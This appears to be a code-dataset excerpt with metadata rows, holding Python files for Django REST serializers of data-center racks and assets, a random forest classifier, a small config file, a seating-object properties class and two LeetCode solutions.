TYPE_ASSET = 'asset'
TYPE_PDU = 'pdu'
class AdminMixin(serializers.ModelSerializer):
"""
A field that returns object's admin url
"""
def admin_link(self, obj):
return reverse('admin:{app_label}_{module_name}_change'.format(
app_label=obj._meta.app_label,
module_name=obj._meta.module_name,
), args=(obj.id,))
class AssetSerializerBase(serializers.ModelSerializer):
model = serializers.CharField(source='model.name')
url = serializers.SerializerMethodField('get_absolute_url')
core_url = serializers.SerializerMethodField('get_core_url')
hostname = serializers.SerializerMethodField('get_hostname')
service = serializers.CharField(source='service.name')
orientation = serializers.SerializerMethodField('get_orientation')
def get_orientation(self, obj):
if not hasattr(obj.device_info, 'get_orientation_desc'):
return 'front'
return obj.device_info.get_orientation_desc()
def get_absolute_url(self, obj):
return obj.get_absolute_url()
def get_core_url(self, obj):
"""
Return the URL to device in core.
"""
url = None
device_core_id = obj.device_info.ralph_device_id
if device_core_id:
url = reverse('search', kwargs={
'details': 'info', 'device': device_core_id
})
return url
def get_hostname(self, obj):
device = obj.linked_device
return device.name if device else ''
class RelatedAssetSerializer(AssetSerializerBase):
slot_no = serializers.CharField(source='device_info.slot_no')
class Meta:
model = Asset
fields = (
'id', 'model', 'barcode', 'sn', 'slot_no', 'url', 'core_url',
'hostname', 'service', 'orientation'
)
class AssetSerializer(AssetSerializerBase):
category = serializers.CharField(source='model.category.name')
height = serializers.FloatField(source='model.height_of_device')
front_layout = serializers.CharField(source='model.get_front_layout_class')
back_layout = serializers.CharField(source='model.get_back_layout_class')
position = serializers.IntegerField(source='device_info.position')
children = RelatedAssetSerializer(
source='get_related_assets',
many=True,
)
_type = serializers.SerializerMethodField('get_type')
management_ip = serializers.SerializerMethodField('get_management')
url = serializers.SerializerMethodField('get_absolute_url')
def get_type(self, obj):
return TYPE_ASSET
def get_management(self, obj):
device = obj.linked_device
if not device:
return ''
management_ip = device.management_ip
return management_ip.address if management_ip else ''
class Meta:
model = Asset
fields = (
'id', 'model', 'category', 'height', 'front_layout', 'back_layout',
'barcode', 'sn', 'url', 'core_url', 'position', 'children',
'_type', 'hostname', 'management_ip', 'service', 'orientation'
)
class RackAccessorySerializer(serializers.ModelSerializer):
type = serializers.CharField(source='accessory.name')
_type = serializers.SerializerMethodField('get_type')
orientation = serializers.SerializerMethodField('get_orientation')
def get_type(self, obj):
return TYPE_ACCESSORY
def get_orientation(self, obj):
return obj.get_orientation_desc()
class Meta:
model = RackAccessory
fields = ('position', 'orientation', 'remarks', 'type', '_type')
class PDUSerializer(serializers.ModelSerializer):
model = serializers.CharField(source='model.name')
orientation = serializers.IntegerField(source='get_orientation_desc')
url = serializers.CharField(source='get_absolute_url')
def get_type(self, obj):
return TYPE_PDU
class Meta:
model = Asset
fields = ('model', 'sn', 'orientation', 'url')
class RackSerializer(AdminMixin, serializers.ModelSerializer):
free_u = serializers.IntegerField(source='get_free_u', read_only=True)
orientation = serializers.CharField(source='get_orientation_desc')
rack_admin_url = serializers.SerializerMethodField('admin_link')
class Meta:
model = Rack
fields = (
'id', 'name', 'data_center', 'server_room', 'max_u_height',
'visualization_col', 'visualization_row', 'free_u', 'description',
'orientation', 'rack_admin_url',
)
def update(self):
orientation = self.data['orientation']
self.object.orientation = RackOrientation.id_from_name(orientation)
return self.save(**self.data)
class DCSerializer(AdminMixin, serializers.ModelSerializer):
rack_set = RackSerializer()
admin_link = serializers.SerializerMethodField('admin_link')
class Meta:
model = DataCenter
fields = ('id', 'name', 'visualization_cols_num',
'visualization_rows_num', 'rack_set', 'admin_link')
depth = 1
| 32.238372 | 79 | 0.679892 | 5,021 | 0.9055 | 0 | 0 | 0 | 0 | 0 | 0 | 1,267 | 0.228494 |
1d2cf95c0dec50f1e5b2fe20f8276992a649f783 | 2,163 | py | Python | endochrone/ensemble/random_forest.py | nickwood/endochrone | 050a2604be82ee4cd5ee6357ea72d3d6d4117277 | [
"MIT"
] | 2 | 2020-04-20T15:41:53.000Z | 2021-11-25T18:52:20.000Z | endochrone/ensemble/random_forest.py | nickwood/endochrone | 050a2604be82ee4cd5ee6357ea72d3d6d4117277 | [
"MIT"
] | null | null | null | endochrone/ensemble/random_forest.py | nickwood/endochrone | 050a2604be82ee4cd5ee6357ea72d3d6d4117277 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
import time
from endochrone import Base
from endochrone.classification import BinaryDecisionTree
__author__ = "nickwood"
__copyright__ = "nickwood"
__license__ = "mit"
class RandomForest(Base):
def __init__(self, n_trees, sample_size=None, feat_per_tree=None,
max_tree_depth=None):
self.n_trees = n_trees
self.samp_per_tree = sample_size
self.feat_per_tree = feat_per_tree
self.max_tree_depth = max_tree_depth
self.trees = []
super().__init__()
def fit(self, x, y, debug=False):
self.validate_fit(features=x, targets=y)
n_samples = x.shape[0]
if self.samp_per_tree is None:
self.samp_per_tree = int(2 * n_samples / self.n_trees)
self.trees = [BinaryDecisionTree(max_depth=self.max_tree_depth)
for i in range(self.n_trees)]
for tree in self.trees:
t0 = time.process_time()
if self.feat_per_tree is None:
x_feat = x
else:
x_feat = take_features(self.feat_per_tree, x, y)
x_samp, y_samp = take_samples(self.samp_per_tree, x_feat, y)
tree.fit(x_samp, y_samp)
t1 = time.process_time()
if debug:
print("tree fitted in %.06f seconds" % (t1-t0))
return self
def predict(self, x):
self.validate_predict(features=x)
predictions = (np.transpose([t.predict(x) for t in self.trees]))
return np.array([consensus(votes) for votes in predictions])
def consensus(votes):
votes, counts = np.unique(votes, return_counts=True)
return votes[np.argmax(counts)]
def take_samples(sample_size, x, y):
sample_indexes = np.random.choice(range(len(x)), sample_size)
return x[sample_indexes], y[sample_indexes]
def take_features(n_features, x, y):
if n_features > x.shape[1]:
raise ValueError("More features specified than available")
sample_features = np.random.choice(range(len(x[0])), n_features,
replace=False)
return x[:, sample_features]
| 31.808824 | 72 | 0.626445 | 1,383 | 0.63939 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.054554 |
1d2f8198cf092ac9dcd093d637fd09e17f523d59 | 65 | py | Python | projects/microphysics/scripts/config.py | jacnugent/fv3net | 84958651bdd17784fdab98f87ad0d65414c03368 | [
"MIT"
] | 5 | 2021-03-20T22:42:40.000Z | 2021-06-30T18:39:36.000Z | projects/microphysics/scripts/config.py | jacnugent/fv3net | 84958651bdd17784fdab98f87ad0d65414c03368 | [
"MIT"
] | 195 | 2021-09-16T05:47:18.000Z | 2022-03-31T22:03:15.000Z | projects/microphysics/scripts/config.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | 1 | 2021-06-16T22:04:24.000Z | 2021-06-16T22:04:24.000Z | BUCKET = "vcm-ml-experiments"
PROJECT = "microphysics-emulation"
| 21.666667 | 34 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.676923 |
1d2fc36b7b8ff3b5ce1d287df0ac8a8feac9ce2e | 330 | py | Python | seatsio/events/objectProperties.py | nathanielwarner/seatsio-python | e731ed0c37f2496c620b40e38527a58bf3b9a9b2 | [
"MIT"
] | 2 | 2018-03-29T18:21:01.000Z | 2022-02-08T10:49:47.000Z | seatsio/events/objectProperties.py | nathanielwarner/seatsio-python | e731ed0c37f2496c620b40e38527a58bf3b9a9b2 | [
"MIT"
] | 7 | 2018-09-03T12:31:52.000Z | 2022-02-01T08:25:09.000Z | seatsio/events/objectProperties.py | nathanielwarner/seatsio-python | e731ed0c37f2496c620b40e38527a58bf3b9a9b2 | [
"MIT"
] | 2 | 2020-12-22T09:51:07.000Z | 2021-12-13T15:37:14.000Z | class ObjectProperties:
def __init__(self, object_id, extra_data=None, ticket_type=None, quantity=None):
if extra_data:
self.extraData = extra_data
self.objectId = object_id
if ticket_type:
self.ticketType = ticket_type
if quantity:
self.quantity = quantity
| 33 | 84 | 0.636364 | 329 | 0.99697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1d2fdc2424cb9c6df54a0b050148d4cc5b4644c3 | 463 | py | Python | Leetcode/1096. Brace Expansion II/solution1.py | asanoviskhak/Outtalent | c500e8ad498f76d57eb87a9776a04af7bdda913d | [
"MIT"
] | 51 | 2020-07-12T21:27:47.000Z | 2022-02-11T19:25:36.000Z | Leetcode/1096. Brace Expansion II/solution1.py | CrazySquirrel/Outtalent | 8a10b23335d8e9f080e5c39715b38bcc2916ff00 | [
"MIT"
] | null | null | null | Leetcode/1096. Brace Expansion II/solution1.py | CrazySquirrel/Outtalent | 8a10b23335d8e9f080e5c39715b38bcc2916ff00 | [
"MIT"
] | 32 | 2020-07-27T13:54:24.000Z | 2021-12-25T18:12:50.000Z | import re
class Solution:
def helper(self, expression: str) -> List[str]:
s = re.search("\{([^}{]+)\}", expression)
if not s: return {expression}
g = s.group(1)
result = set()
for c in g.split(','):
result |= self.helper(expression.replace('{' + g + '}', c, 1))
return result
def braceExpansionII(self, expression: str) -> List[str]:
return sorted(list(self.helper(expression)))
| 22.047619 | 74 | 0.542117 | 450 | 0.971922 | 0 | 0 | 0 | 0 | 0 | 0 | 23 | 0.049676 |
1d319276207ded7138c364ab240ee169b00896eb | 455 | py | Python | 3-longest-substring-without-repeating-characters.py | Iciclelz/leetcode | e4b698e0161033922851641885fdc6e47f9ce270 | [
"Apache-2.0"
] | null | null | null | 3-longest-substring-without-repeating-characters.py | Iciclelz/leetcode | e4b698e0161033922851641885fdc6e47f9ce270 | [
"Apache-2.0"
] | null | null | null | 3-longest-substring-without-repeating-characters.py | Iciclelz/leetcode | e4b698e0161033922851641885fdc6e47f9ce270 | [
"Apache-2.0"
] | null | null | null | class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
if len(s) == 0:
return 0
m = 1
for _ in range(len(s)):
i = 0
S = set()
for x in range(_, len(s)):
if s[x] not in S:
S.add(s[x])
i += 1
else:
break
m = max(i, m)
return m | 23.947368 | 54 | 0.316484 | 455 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |